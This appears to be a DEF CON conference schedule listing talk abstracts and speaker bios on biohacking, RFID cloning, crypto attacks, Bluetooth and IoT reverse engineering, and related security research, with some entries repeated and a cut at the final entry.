Jeffrey Tibbetts is a Biohacker, blogger, body mod artist and nurse out of Southern California. He’s been a collaborator on projects ranging from insufflatable peptides that extend REM sleep to non-Newtonian armor implants. He placed 3rd in the Biohack Village Oxytocin Poker Tournament and performed an implant on transhumanist presidential candidate Zoltan Istvan. Jeff hosts the annual event, “Grindfest” in Tehachapi California which New York Times states is for “the real transhumanists.” He shares his lab space with two fantastic cats, Chango and Grumpus, as well as two merely acceptable cats, Binky and Mildew.
Abstract:
Over the past decade, the ways we pursue human improvement have become increasingly invasive. We’ve so far been fortunate, but it’s likely if not inevitable that a death will occur due to biohacking. This presentation discusses the many precautions being taken by biohackers to make our procedures and projects as safe as possible.
Return to Index
BHV - Skyview 4 - Saturday - 11:00-11:59
Speaker: Jeffrey Tibbetts
About Jeffrey:
Jeffrey Tibbetts is a Biohacker, blogger, body mod artist and nurse out of Southern California. He’s been a collaborator on projects ranging from insufflatable peptides that extend REM sleep to non-Newtonian armor implants. He placed 3rd in the Biohack Village Oxytocin Poker Tournament and performed an implant on transhumanist presidential candidate Zoltan Istvan. Jeff hosts the annual event, “Grindfest” in Tehachapi California which New York Times states is for “the real transhumanists.” He shares his lab space with two fantastic cats, Chango and Grumpus, as well as two merely acceptable cats, Binky and Mildew.
Abstract:
Over the past decade, the ways we pursue human improvement have become increasingly invasive. We’ve so far been fortunate, but it’s likely if not inevitable that a death will occur due to biohacking. This presentation discusses the many precautions being taken by biohackers to make our procedures and projects as safe as possible.
Return to Index
BHV - Skyview 4 - Friday - 18:00-18:59
Speakers: Dr. Stan Naydin and Vlad Gostomelsky
About Dr. Stan Naydin:
Dr. Stan Naydin is in residency to for neurology with specialization in neuro-critical care and neuro interventional. Background in pharmaceutical science. He is heavily focused on procedure based medicine. He has been involved in a multitude of advanced surgeries and interventions. Partial liver resections, vascular transplants, joint replacements, breast augmentation, neurological interventions including vascular stenting, aneurysm coiling, and ventriculostomies. Prior to transitioning to the medical field Stan was industrial robotics designer and programmer in the glass industry.
About Vlad Gostomelsky:
Vlad Gostomelsky is a driven security researcher with a passion for securing technology that makes civilized life possible. He is particularly focused on satellite systems security, SCADA systems supporting the critical infrastructure and wireless networks.
He specializes in the intersection of physical and network security. He has worked on DARPA projects, established and lead penetration testing teams for Fortune 50 organizations, performed incident response and forensics on sensitive production systems within controlled environments, reverse engineered security devices, and participated in countless red team engagements for banks, critical infrastructure, pharmaceutical companies, law firms and research organizations. Vlad has spoken at various security conferences including Bsides, DEFCON, HOPE, and ShmooCon. Vlad was a board member for NYC OWASP and remains committed to the security community working together to improve the security posture through developer education, end user training, peer-reviewed code and rigorous standardized testing methodologies
Abstract:
Working as a physician Dr. Naydin has had experience from being in the operating room as first assist, primary surgeon in the cath lab for neuro intervention procedures, seeing post-surgical complications as outpatient, to admitting people in the ED. With the world of biohacking and implanting hardware expanding, postsurgical complications are too increasing in numbers. He will show pictures and share my experiences with such complications. He has experience with patients having ischemic strokes and losing an entire hemisphere of their brains, infected pacemakers requiring surgical revision, infected breast implants, and complicated knee replacements. As we modify our own bodies, we as hackers have to be mindful of our own mortal limitations. Along with sharing my experiences, I would like to provide some insight into what to look out for. When do you cut your losses and get to the ED?
Return to Index
BHV - Skyview 4 - Friday - 12:00-12:59
Speaker: Renee Wegzyn and Doug Weber
About Renee Wegzyn:
Dr. Renee Wegrzyn joined DARPA as a Program Manager in 2016. She is interested in applying the tools of synthetic biology to support biosecurity and outpace infectious disease. Prior to joining DARPA as a PM, Dr. Wegrzyn was a Senior Lead Biotechnologist at Booz Allen Hamilton, where she led a team that provided scientific and strategic support in the areas of biodefense, biosecurity, disruptive technologies, emerging infectious disease, neuromodulation, and synthetic biology to DARPA and other federal and private institutions.
About Doug Weber:
Doug Weber is a Program Manager in the Biological Technology Office (BTO) at the Defense Advanced Research Projects Agency (DARPA). He is also an Associate Professor of Bioengineering at the University of Pittsburgh. At DARPA, Dr. Weber is currently managing the Hand Proprioception and Touch Interfaces (HAPTIX) program, aimed at developing human-ready, fully-implantable interface systems that enable trans-radial amputees to control and sense advanced, multi- functional prosthetic limbs. Dr. Weber is also managing the Electrical Prescriptions (ElectRx) program, which seeks to advance the science and technology of neuromodulation treatments for inflammatory disease and mental health disorders.
Abstract:
From programmable microbes to human-machine symbiosis, DARPA’s Biological Technologies Office is expanding the concept of technology and redefining how we interact with and use biology. No longer limited to traditional sensorimotor restoration or therapeutic autonomic modulation, DARPA is developing neurotechnologies that are crossing into applications that stand to overcome current limitations in human performance. Meanwhile, rapid democratization of gene synthesis and editing techniques is bringing engineered biology to the fore on a global scale, and with it a demand for tools that can ensure that any future deployments of these technologies are safe. BTO is addressing the growing need for these and other biosecurity tools to enable aggressive but responsible development and adoption of new biotechnologies—through the design, for example, of such white hat strategies as countermeasures to reduce the risk of unintended consequences and tools to recall genes from open environments. This talk will provide an overview of emerging neuro- and synthetic-biology technologies under development at DARPA, identify strategies for continued responsible development, and reveal relevant possibilities, probabilities, and vulnerabilities.
Return to Index
BHV - Skyview 4 - Sunday - 14:00-14:59
Speaker: Victoria Sutton
About Victoria:
Victoria Sutton, MPA, PhD, JD
Paul Whitfield Horn Professor
Associate Dean for Research and Faculty Development
Director, Center for Biodefense, Law and Public Policy
Director, Science, Engineering and Technology Law Concentration Program
Director, Dual Degree Programs in Science, Engineering and Technology
Founding Editor, Journal for Biosecurity, Biosafety and Biodefense Law
This session will give you some basic tips for avoiding violating the law, and some preventive tips for avoiding potential legal traps if you are a biohacker. Biohacking, in this session, includes body devices, genetic engineering, synthetic biology and laboratory practices. The session will begin with some examples of why you need to know about law for biohackers and discuss legal cases useful for biohackers. The second part of the session will be a workshop-style applying these rules for biohackers.
Return to Index
BHV - Skyview 4 - Sunday - 14:00-14:59
Speaker: Victoria Sutton
About Victoria:
Victoria Sutton, MPA, PhD, JD
Paul Whitfield Horn Professor
Associate Dean for Research and Faculty Development
Director, Center for Biodefense, Law and Public Policy
Director, Science, Engineering and Technology Law Concentration Program
Director, Dual Degree Programs in Science, Engineering and Technology
Founding Editor, Journal for Biosecurity, Biosafety and Biodefense Law
This session will give you some basic tips for avoiding violating the law, and some preventive tips for avoiding potential legal traps if you are a biohacker. Biohacking, in this session, includes body devices, genetic engineering, synthetic biology and laboratory practices. The session will begin with some examples of why you need to know about law for biohackers and discuss legal cases useful for biohackers. The second part of the session will be a workshop-style applying these rules for biohackers.
Return to Index
BHV - Skyview 4 - Friday - 10:05-10:59
Speaker: Tim Cannon
About Tim:
Tim Cannon is an American software developer, entrepreneur, and biohacker based in Pittsburgh, Pennsylvania. He is best known as the co-founder and Chief Information Officer of Grindhouse Wetware, a biotechnology startup company that creates technology to augment human capabilities.
Cannon has spoken at conferences around the world on the topics of human enhancement, futurism, and citizen science, including at TEDx Rosslyn, FITUR, the University of Maryland, the World Business Dialogue, the Medical Entrepreneur Startup Hospital, and others. He has been published in Wired and featured in television shows such as National Geographic Channel’s Taboo and "The Big Picture with Kal Penn". Tim has been featured on podcasts including Ryan O'Shea's Future Grind and Roderick Russell's Remarkably Human.
Abstract:
The talk will focus on biohacking as not just an ethically grey zone but instead present the idea that biohacking is not just something we would like to see, but is something we must do if we are ever going to be capable of living up to the morals we espouse.
Return to Index
BHV - Skyview 4 - Friday - 10:05-10:59
Speaker: Tim Cannon
About Tim:
Tim Cannon is an American software developer, entrepreneur, and biohacker based in Pittsburgh, Pennsylvania. He is best known as the co-founder and Chief Information Officer of Grindhouse Wetware, a biotechnology startup company that creates technology to augment human capabilities.
Cannon has spoken at conferences around the world on the topics of human enhancement, futurism, and citizen science, including at TEDx Rosslyn, FITUR, the University of Maryland, the World Business Dialogue, the Medical Entrepreneur Startup Hospital, and others. He has been published in Wired and featured in television shows such as National Geographic Channel’s Taboo and "The Big Picture with Kal Penn". Tim has been featured on podcasts including Ryan O'Shea's Future Grind and Roderick Russell's Remarkably Human.
Abstract:
The talk will focus on biohacking as not just an ethically grey zone but instead present the idea that biohacking is not just something we would like to see, but is something we must do if we are ever going to be capable of living up to the morals we espouse.
Return to Index
BHV - Skyview 4 - Friday - 11:00-11:59
Speaker: Mr_Br!ml3y
About Mr_Br!ml3y:
Mr_Br!ml3y grew up farming and liked it so much he went into information technology at the first opportunity. He has 6 years full-time infosec experience and strong side interests in biology and chemistry. He is currently working on a PhD in environmental engineering.
Abstract:
Biosafety levels (1 through 4) have been established to provide standardized safety protocols for biological research in professional settings, to protect researchers and the general public. While the new biohacker might only need a reduce set of lab safety standards (here called biosafety level 0), any bio-researcher needs an awareness of biosafety levels as they develop into commercial (level 1) or medical (level 2) research. Biosafety levels 3 and 4 will be discussed for completeness and to impress on the home researcher the difficulty in safely working with virulent pathogens.
Return to Index
BHV - Skyview 4 - Saturday - 15:00-15:59
Speaker: Ed You
About Ed:
Covert FBI super squirrel, loves working with legos, haikus, and playing handball with cement spheres. Ask him about his time in Panama-Spanish is his third language fluency, followed by sarcasm.
Abstract:
What talk? Its going to be a theatrical song and interpretive dance related to the 5 w's and how to fix our bio economy. You get it, I know you do.
Return to Index
BHV - Skyview 4 - Saturday - 15:00-15:59
Speaker: Ed You
About Ed:
Covert FBI super squirrel, loves working with legos, haikus, and playing handball with cement spheres. Ask him about his time in Panama-Spanish is his third language fluency, followed by sarcasm.
Abstract:
What talk? Its going to be a theatrical song and interpretive dance related to the 5 w's and how to fix our bio economy. You get it, I know you do.
Return to Index
Wireless - Skyview 1 - Saturday - 15:00-15:50
tb68r
Bio
tb69rr (@tb69rr) spent 20 years doing offensive and defensive physical
security and surveillance for the military. Six years ago it became
apparent to him that someone sitting in a basement at computer could hand
him and his team their ass. That was a wake up call. He was a true knuckle
dragger. That is the moment tb69rr decided to make electronic signature and
cyber his focus. He began developing techniques for protecting military and
civilians from tracking using RF, cellular, and cyber. He has consulted for
Darpa, MGM International, General Electric, and various military
organizations. RSA has published his blogs on exploiting digital data and
travel safety. Now tb69rr knuckles drag across a keyboard. He has drank
beer from the Arctic Circle to South America.
@tb68r
Tim Quester
Bio
"Tim K (@bjt2n3904):
is an electronics engineer living in Virginia Beach. He enjoys designing embedded systems and working with radios. Previously, he has taught workshops on Software Defined Radio at conferences like Kiwicon and Cyberspectrum. His favorite programming language is solder."
@bjt2n3904
Blinded by the Light
Abstract
"Did you know some of your tablets and smartphones broadcast IR even with the screen off?
These signals can be used to spot and identify specific operating systems and in some cases specific devices?
This class is designed to help you understand that its not just RF that can betray who you are, and where youve been.
This live demo will expose unintended tracking possibilities with the current use of Infrared Red (IR) proximity detector in cellular devices (and other devices). The presentation will show students how smart phones, Android and iPhone can be identified by the IR patterns they display from a substantial distance. The class will teach techniques to fingerprint these patterns.
Topics:
History:
IR exploits from the past and how to learn from them.
Hardware:
Photo-diode VS LED
Comparators and why we need them
Amplifiers
Improved ir collection techniques with everyday items.
Improvised IR filters
Logic analyser and oscilloscope techniques for reading a signal.
Software:
Using arduino to evalaute IR in the wild.
How to make sense of a signal that are not in a library
The audience will also be given directions on how to make there own IR detection device to detect IR in a variety of situations. This tool will allow people to know when their devices are triggering IR responses and to discover if devices around them are using IR. It will also allow them to demodulate and view what type of data is being sent via IR. Class will be encouraged to discover and target there own devices as a proof of concept.
"
Return to Index
BHV - Skyview 4 - Friday - 16:00-16:59
Speakers: John Bass
About John:
John Bass is the Founder and CEO of Hashed Health, a healthcare technology innovation company focused on accelerating the realization of blockchain and distributed ledger technologies. John has over 20 years of experience in healthcare technology with expertise in collaborative platforms, patient engagement, systems integration, supply chain, clinical performance and value-based payments.
Prior to Hashed Health, John was CEO at InVivoLink, a surgical patient registry and care management start-up, acquired by HCA in 2015. John’s experience also includes healthcare B2B startup empactHealth.com which was acquired by Medibuy / Global Healthcare Exchange. John is a native of Nashville and has a Chemistry degree from the University of North Carolina, Chapel Hill.
Abstract:
Over the next ten years, blockchain and distributed ledger technologies will fundamentally change the delivery of care around the globe. The blockchain provides a technical framework where trust is moved from central controlling intermediaries to the open source protocol, freeing data and assets from the control of traditional corporate interests. The great hope is that this evolution will result in the empowerment of consumers, communities, and markets centered on sustainable wellness and environments of health. The coming years represent a unique opportunity to make sure blockchain-based global health initiatives are structured in a way that re-constructs our broken system in a way that improves the lives of individuals and the communities in which they live.
Return to Index
BHV - Skyview 4 - Friday - 16:00-16:59
Speakers: John Bass
About John:
John Bass is the Founder and CEO of Hashed Health, a healthcare technology innovation company focused on accelerating the realization of blockchain and distributed ledger technologies. John has over 20 years of experience in healthcare technology with expertise in collaborative platforms, patient engagement, systems integration, supply chain, clinical performance and value-based payments.
Prior to Hashed Health, John was CEO at InVivoLink, a surgical patient registry and care management start-up, acquired by HCA in 2015. John’s experience also includes healthcare B2B startup empactHealth.com which was acquired by Medibuy / Global Healthcare Exchange. John is a native of Nashville and has a Chemistry degree from the University of North Carolina, Chapel Hill.
Abstract:
Over the next ten years, blockchain and distributed ledger technologies will fundamentally change the delivery of care around the globe. The blockchain provides a technical framework where trust is moved from central controlling intermediaries to the open source protocol, freeing data and assets from the control of traditional corporate interests. The great hope is that this evolution will result in the empowerment of consumers, communities, and markets centered on sustainable wellness and environments of health. The coming years represent a unique opportunity to make sure blockchain-based global health initiatives are structured in a way that re-constructs our broken system in a way that improves the lives of individuals and the communities in which they live.
Return to Index
DEFCON - Track Two - Friday - 12:00-12:59
Blockfighting with a Hooker -- BlockfFghter2!
K2 Director, IOACTIVE
What's your style of hooking? My hooking Style? It's like hooking without hookers.
The use cases for hooking code execution are abundant and this topic is very expansive. EhTracing (pronounced ATracing) is technique that allows monitoring/altering of code execution at a high rate with several distinct advantages.
- Full context (registers, stack & system state) hooking can be logged without needing to know a function prototype and changes to execution flow can be made as desired.
- Traditional detours like hooking requires a length disassembly engine than direct binary .text segment modifications to insert an intended hook (no changes to binary needed with EhTrace).
- Block/Branch stepping enables a simplification of analysis code (does not need to do a full procedure/function graph recognition/traversal). This will feature focus on the use of VEH and the DR7 backdoor in x64 Windows.
In a nutshell, EhTrace enables very good performance, in proc debugging and a dead simple RoP hook primitive. Some neat graphics and visualizations will be made some of the early examples up at https://github.com/K2/EhTrace
This novel implementation for hookers establishes a model for small purpose built block-fighting primitives to be used in order to analyze & do battle, code vs. code.
As a special bonus "round 3 FIGHT!" we will see a hypervisor DoS that will cause a total lockup for most hypervisors (100%+ utilization per CORE). This goes to show that emulating or even adapting a hypervisor to a full CPU feature set is exceedingly hard and it’s unlikely that a sandbox/hypervisor/emulator will be a comprehensive solution to evade detection from adversarial code for some time.
Let’s have some fun blockfighting with some loose boxed hookers!
K2 likes to poke around at security cyber stuff, writing tools and exploits to get an understanding of what’s easy, hard and fun/profit! He’s written and contributed to books, papers and spent time at security conferences over the years.
K2 currently works with IOActive and enjoys a diverse and challenging role analyzing some of the most complex software systems around.
ktwo
Twitter @IOACTIVE
github.com/K2
github.com/ShaneK2
Return to Index
Demolabs - Table 3 - Saturday - 12:00-13:50
Boscloner - All in One RFID Cloning Toolkit
Phillip Bosco
The Boscloner is an All in One RFID Cloning Toolkit designed to make RFID badge cloning during a penetration testing engagement trivial, accessible, and lightning fast. The Boscloner’s core functionality set revolves around its ability to capture RFID badges from three feet away, automatically clone the captured badge (in seconds!), and allow the penetration tester to reach into a pocket and pull out a cloned and fully functioning badge providing instantaneous access to a restricted area. Access granted!
With its open source nature, high accessibility, and focus on furthering the security industry through community collaboration, the Boscloner has become the new golden standard for RFID penetration testing engagements.
Phillip Bosco possesses over 10 years of experience information security via both commercial and government positions. While currently employed as a Senior Security Consultant for Rapid7, Phillip’s previous employment includes the United States Marine Corps as a Cyber Marine and CSC as a penetration tester. Phillip is active in research, focusing primarily on social engineering and physical security. During his research into home security systems, he discovered a flaw that allows malicious individuals to break into a house without triggering an alarm and the attack works against multiple vendors. His discovery has captured the media’s attention by such publications as Wired Magazine, Washington Times, NetworkWorld, ArsTechnica, ZDNet, CSO Online, InfoSecurity Magazine, The Verge, and more. Phillip is scheduled to complete his Master’s Degree in Information Security Engineering from SANS Institute by the Fall of 2016. Phillip holds the following information security credentials:
OSCP, OSWP, CISSP, GSEC (Gold), GCIA (Gold), GPEN, GWAPT, GCIH, CEH, ECSA, CNDA, A+, Network+, Security+
Return to Index
Workshops - Las Vegas Ballroom 3 - Saturday - 10:00-14:00
Brainwashing Embedded Systems
Craig Young Security Researcher, Tripwire
Learning the secret incantations to make embedded systems carry out your will is not as hard as one might think. In the world of IoT, the hardened system is rare and most times a firmware image is more than enough to find and exploit weakness. This session explains in detail a process for going from zero-knowledge to zero-day on real-world devices without breaking a sweat. Attendees to this tutorial session will learn the ropes of firmware dissection, app decompilation, and manual fuzz testing in a hands-on hack lab. Participants will be provided with a customized Kali Linux virtual appliance and given access to several consumer devices for analysis. These techniques have been successfully employed by the author to identify over 100 CVEs on embedded/IoT devices as well as to win the 0-day and CTF tracks in the DEF CON 22 SOHOpelessly Broken router hacking competition.
Craig Young is a computer security researcher with Tripwire's Vulnerability and Exposures Research Team (VERT). He has identified and responsibly disclosed dozens of vulnerabilities in products from Google, Amazon, IBM, NETGEAR, Adobe, HP, Apple, and others. His research has resulted in numerous CVE assignments and repeated recognition in the Google Application Security Hall of Fame. Craig's presentations on Google authentication weaknesses have led to considerable security improvements for all Google users. Craig won in track 0 and track 1 of the first ever SOHOpelessly Broken contest at DEF CON 22 by demonstrating 10 0-day flaws in SOHO wireless routers. His research into iOS WiFi problems more recently exposed CVE-2015-3728 that could allow devices to inadvertently connect to malicious hot spots. Craig has more recently turned his attention to a different part of the wireless spectrum with research into home automation products as well as RFID/NFC technology.
Max Class Size: 55
Prerequisites for students: Basic *nix knowledge; comfort with a shell; understanding of HTTP
Materials or Equipment students will need to bring to participate: If you need to collect a fee for materials, list them in your application, you will need to provide a list so attendees can purchase materials themselves in advance.
Nothing is required but in order to make the most out of the workshop, students will want to have a laptop with an 802.11 adapter and virtualization software capable of running an x86_64 virtual machine from an OVA/OVF (e.g. VirtualBox or VMWare). Virtual machine files will be made available on USB so an open USB port is preferred.
Return to Index
CPV - Bronze 2 - Saturday - 13:30-15:00
Talk Title:
Breaking Bad Crypto: BB'06 [WORKSHOP]
Speaker Name, Employer or position:
Filippo Valsorda
Abstract:
Learn cryptography, or at least why you should stay away from it, the fun way! By breaking some yourself, live. After doing hash extension and CBC padding oracles the past years, today we'll implement one of the evergreens of crypto attacks: the Bleichenbacher '06 e=3 RSA signature forgery.
Bleichenbacher '06 is a common attack against RSA that allows an attacker to fake a signature. It broke Firefox, then GnuTLS, then again Firefox (BERserk), then python-rsa... And who knows next. You'll learn how it works, how to mount it, and then attack real world implementations with your own code.
The session is 100% hands-on, with very little material (basically just docs, a target server implementation, and some client boilerplate). I'll explain the crypto and attack basics and then proceed to code the exploit live, along with the audience, stopping often to analyze and compare outputs and milestones.
No slides, just cold hard code and data produced along the way.
No cryptography experience needed at all. Bring your laptop and Python chops.
Bio:
Filippo Valsorda (@FiloSottile) is a systems and cryptography engineer at CloudFlare, where he kicked DNSSEC until it became something deployable. Nevertheless, he's probably best known for making popular online vulnerability tests, including the original Heartbleed test. Hes really supposed to implement cryptosystems, not break them, but you know how it is.
Social media links if provided:
@FiloSottile
Return to Index
SkyTalks - Skyview 3 - Friday - 15:00-15:59
Speakers: Nir Valtman, Patrick Watson
Talk: Breaking Payment Points of Interaction
The payment industry is becoming more driven by security standards. However, the corner stones are still broken even with the latest implementations of these payments systems, mainly due to focusing on the standards rather than security. The best example for that is the ability to bypass protections put in place by points of interaction (POI) devices, by simple modifying several files on the point of sale or manipulating the communication protocols. In this presentation, we will explain the main flaws and provide live demonstrations of several weaknesses on a widely used pinpad. We will not exploit the operating system of the pinpad, but actually bypass the application layer and the business logic protections, i.e. the crypto algorithm is secure, but everything around it is broken. As part of our demos, we will include EMV bypassing, avoiding PIN protections and scraping PANs from various channels.
Return to Index
DEFCON - Track Three - Friday - 16:00-16:59
Breaking the Internet of Vibrating Things : What We Learned Reverse Engineering Bluetooth- and Internet-Enabled Adult Toys
follower Hacker
goldfisk Hacker
The Internet of Things is filled with vulnerabilities, would you expect the Internet of Vibrating Things to be any different? As teledildonics come into the mainstream, human sexual pleasure has become connected with the concerns of privacy and security already familiar to those who previously only wanted to turn on their lights, rather than their lover. Do you care if someone else knows if you or your lover is wearing a remote control vibrator? Do you care if the manufacturer is tracking your activity, sexual health and to whom you give control? How do you really know who is making you squirm with pleasure? And what happens when your government decides your sex toy is an aid to political dissidents? Because there’s nothing more sexy than reverse engineering we looked into one product (the We-Vibe 4 Plus from the innocuously named "Standard Innovation Corporation") to get answers for you.
Attend our talk to learn the unexpected political and legal implications of internet connected sex toys and, perhaps more importantly, how you can explore and gain more control over the intimate devices in your life. Learn the reverse engineering approach we took--suitable for both first timers and the more experienced--to analyze a product that integrates a Bluetooth LE/Smart wireless hardware device, mobile app and server-side functionality. More parts means more attack surfaces! Alongside the talk, we are releasing the "Weevil" suite of tools to enable you to simulate and control We-Vibe compatible vibrators. We invite you to bring your knowledge of mobile app exploits, wireless communication hijacking (you already hacked your electronic skateboard last year, right?) and back-end server vulnerabilities to the party. It’s time for you to get to play with your toys more privately and creatively than before.
Please note: This talk contains content related to human sexuality but does not contain sexually explicit material. The presenters endorse the DEF CON Code of Conduct and human decency in relation to matters of consent--attendees are welcome in the audience if they do the same. Keep the good vibes. :)
follower talks with computers and humans. Six years after first speaking at DEF CON about vulnerabilities in the Internet of Things, the fad hasn’t blown over so is back doing it again. An interest in code and hardware has lead to Arduino networking and USB projects and teaching others how to get started with Arduino. Tim O'Reilly once called follower a ‘troublemaker’ for his Google Maps reverse engineering.
Twitter: @rancidbacon
goldfisk spins fire by night and catches up with computer science lectures, also by night. And wishes headphone cables would stop getting caught on stuff. An interest in reverse engineering can be blamed on a childhood playing with electronics and re-implementing browser games in Scratch.
Twitter: @g0ldfisk
Return to Index
DEFCON - DEF CON 101 - Friday - 10:00-10:59
BSODomizer HD: A Mischievous FPGA and HDMI Platform for the (M)asses
Joe Grand (Kingpin) Grand Idea Studio
Zoz Hacker
At DEF CON 16 in 2008, we released the original BSODomizer (www.bsodomizer.com), an open source VGA pranking tool and introductory hacking platform for the multicore Propeller micro-controller. Hours of productivity were replaced with rage and frustration as unwitting computer users were confronted with fake Blue Screens of Death and revolting ASCII art. But, the world has changed. The machines have risen in capability. HDMI is the graphical transmission protocol of choice and hacking with micro-controllers is standard issue. The as-seen-on-HDTV duo of Joe Grand and Zoz return with the next generation of mischievous hardware, a device that supplants or captures any inline HDMI signal in a discreet, pentest-worthy package. BSODomizer HD is an FPGA-based system that not only improves on the graphics interception and triggering features of its predecessor, but can now capture screenshots of a target system and also provides a fully open design that you can use for your own experiments into the mystical world of massive, customizable arrays of digital logic. We'll guide you through the process of going from lamer zero to hacker hero with FPGAs, while savagely fucking with a few unfortunate friends along the way!
Joe Grand, also known as Kingpin, is a computer engineer, hardware hacker, former DEF CON badge designer, runner, daddy, honorary doctor, TV host, member of L0pht Heavy Industries, and the proprietor of Grand Idea Studio.
Twitter: @joegrand
Zoz is a robotics engineer, prankster, and renaissance hacker. Other than BSODs, things he enjoys faking include meteorite impacts, crop circles, and alien crash landings.
Return to Index
IOT - Bronze 1 - Friday - 15:00-15:50
BtleJuice: the Bluetooth Smart Man In The Middle Framework
Damien Cauquil, Digital Security (CERT-UBIK), Senior Security Researcher
The BtleJuice framework provides all the features to perform Man-in-the-middle attacks on devices using Bluetooth Low Energy (also known as Bluetooth Smart) and requires no expensive hardware nor SDR device. This talk will discuss most of its features, how to use it to assess the security of smart devices and find vulnerabilities, including live demos. The framework source code will be released just before the talk.
Damien Cauquil is a senior security researcher at Digital Security (CERT-UBIK), a French security company focused on IoT and related ground breaking technologies. He spoke at various international security conferences including Chaos Communication Camp, Hack.lu, Hack In Paris and a dozen of times at the Nuit du Hack (one of the oldest French security conferences).
@virtualabs
Return to Index
WOS - Skyview 6 - Sunday - 11:10-11:59
Building a Local Passive DNS Tool for Threat Intelligence Research
Kathy Wang, Security Strategist and Researcher at Splunk, Inc.
Currently, many Security Operations capabilities struggle with obtaining useful passive DNS data post breach. Breaches are often detected months after the attack. Due to the ephemeral nature of malicious DNS domains, existing well-known passive DNS collections lack complete visibility to aid in conducting incident response and malware forensics. We will present a new tool to collect local passive DNS data, which will enable security operations capabilities to conduct more effective defense against malware, including APTs, zero days, and targeted attacks. Our presentation will consist of a demo of the tool, and the tool will be released for public use.
Kathy Wang (Twitter: @wangkathy) Kathy Wang is an internationally-recognized malware expert, who has researched, developed, evaluated, and operationalized various solutions for detecting and preventing client-side attacks used by advanced persistent threats (APT), as they target common platforms (e.g., browser, email, mobile phones). Prior to Splunk, Kathy has held past positions such as Director of Research and Development at ManTech International, and Principal Investigator of the Honeyclient Project at The MITRE Corporation, during which she pioneered a prototype that became the basis of current cutting-edge zero-day malware detection technologies. Kathy has spoken at many security conferences and panels internationally, including RSA, DEF CON, AusCERT, and REcon. She has co-authored a book, Beautiful Security, and holds a BS and MS in Electrical Engineering from The University of Michigan, Ann Arbor.
Return to Index
HHV - Contest Area - Friday - 12:00-12:59
Building malicious hardware out of analog circuits
Matthew Hicks
Can you trust your chipset? What if a fabrication-time attacker could slightly modify a processor circuit design to include a weaponizable modification? One that normal testing is not likely to detect and eludes activation by a diverse set of benchmarks? Matthew Hicks and his research partners have done this with the addition of a small analog ciruit to an open source processor; it is the first openly malicious processor. Come hear about the details.
Return to Index
Demolabs - Table 1 - Saturday - 16:00-17:50
BurpSmartBuster
Patrick Mathieu
Bruteforcing non-indexed data is often use to discover hidden files and directories which can lead to information disclosure or even a system compromise when a backup file is found. This bruteforce technique is still useful today, but the tools are lacking the application context and aren't using any smart behaviour to reduce the bruteforce scanning time or even be stealthier. BurpSmartBuster, a Burp Suite Plugin offers to use the application context and add the smart into the Buster!
This presentation will reveal this new open-source plugin and will show practical case of how you can use this new tool to accelerate your Web pentest to find hidden treasures! The following will be covered:
- How to add context to a web bruteforce tool
- How we can be stealthier
- How to limit the number of requests: Focus only on what is the most critical
- Show how simple the code is and how you can help to make it even better
Patrick Mathieu is cofounder of Hackfest.ca the largest security event in Eastern Canada and has been involved in computer security for more than 10 years in the hacking community around Quebec, Canada for more than 20 years starting when he found text about hacking in the last online BBS. He is currently employed as Senior Security Consultant where he’s specialised in application security for both offence and defence currently assign to multiple webapp pentests and trainings. Patrick holds a Bachelor and College degree in computer science.
Return to Index
DEFCON - Track One - Saturday - 12:00-12:59
Bypassing Captive Portals and Limited Networks
Grant Bugher Perimeter Grid
Common hotspot software like Chilispot and Sputnik allow anyone to set up a restricted WiFi router or Ethernet network with a captive portal, asking for money, advertising, or personal information in exchange for access to the Internet. In this talk I take a look at how these and similar restrictive networks work, how they identify and restrict users, and how with a little preparation we can reach the Internet regardless of what barriers they throw up.
Grant Bugher has been hacking and coding since the early 90's and working professionally in information security for the last 12 years. He is currently a security engineer for a cloud service provider, and has previously been an architect, program manager and software engineer on a variety of online services, developer tools and platforms. Grant is a prior speaker at BlackHat and DEF CON and a regular DEF CON attendee since DEF CON 16. Most of his research and work is on cloud computing and storage platforms, application security, and detecting & investigating attacks against web-scale applications.
Twitter: @fishsupreme.
perimetergrid.com
Return to Index
Workshops - Las Vegas Ballroom 1 - Thursday - 15:00-19:00
C/C++ Boot Camp for Hackers
Eijah Founder, demonsaw
The C/C++ programming language is one of the most important programming languages ever created. Ever since Dennis Ritchie invented the language and Bjarne Stroustrup added object-oriented capabilities to it, C/C++ has been the standard by which all other languages are judged. C/C++ is considered the lingua franca of UNIX, Linux, BSD, and Windows as well as many software toolsets including GNU, Aircrack-ng, and the GCC compiler. And not only that, but C/C++ has influenced many other languages including C#, Java, Perl, PHP, and Python.
As hackers, we sometimes have to write code. And while there are more modern and higher-level languages available, C/C++ still plays a strong and prominent role in the hacking world due to its close ties to Linux and BSD. Whether we're writing shell scripts, python programs, PHP websites, contributing to a FOSS project, reverse engineering a binary, or rebuilding/patching the OS kernel; having a familiarity with C/C++ gives us a tremendous advantage and adds a powerful tool to our hacker arsenal.
This workshop is a C/C++ boot camp for hackers. It's an intense hands-on experience designed to get you up-to-speed with the most important parts of the C/C++ programming language using the GCC/G++ compiler. You'll learn about variables, functions, pointers, operators, classes, libraries, threads, templates, data structures, algorithms, exception handling, memory management, and design patterns. Whether you're a professional programmer, find yourself a little rusty and simply want a refresher course, or even if you'd never programmed in C/C++ before; this workshop is for you.
Please note that this is an intermediate-level, technical workshop and requires that attendees have prior experience in at least one programming language. Bring your laptop, a USB flash drive, and your favorite C/C++ 11 compiler (>= gcc/g++ 4.7 or msvc 2013).
Eijah is the founder of demonsaw, a secure and anonymous information sharing program. For the last 5 years he was also a Senior Programmer at Rockstar Games where he worked on Grand Theft Auto V for PS3, Xbox 360, PS4, Xbox One, and PC. Eijah has over 15 years of software development and IT Security experience. His career has covered a broad range of Internet and mid-range technologies, core security, and system architecture. Eijah has been a faculty member at multiple colleges, has spoken about security and development at DEF CON and Hack Miami conferences, and holds a master’s degree in Computer Science. Eijah is an active member of the hacking community and is an avid proponent of Internet freedom.
Max Class Size: 55
Prerequisites for students: Previous experience in at least one programming language is required, although it doesn't have to be in C/C++.
Materials or Equipment students will need to bring to participate: Laptop with Windows, Linux, or OSX. USB flash drive for saving their progress.
Return to Index
DEFCON - Track Three - Friday - 12:00-12:59
CAN i haz car secret plz?
Javier Vazquez Vidal Hardware Security Specialist at Code White Gmbh
Ferdinand Noelscher Information Security Specialist at Code White Gmbh
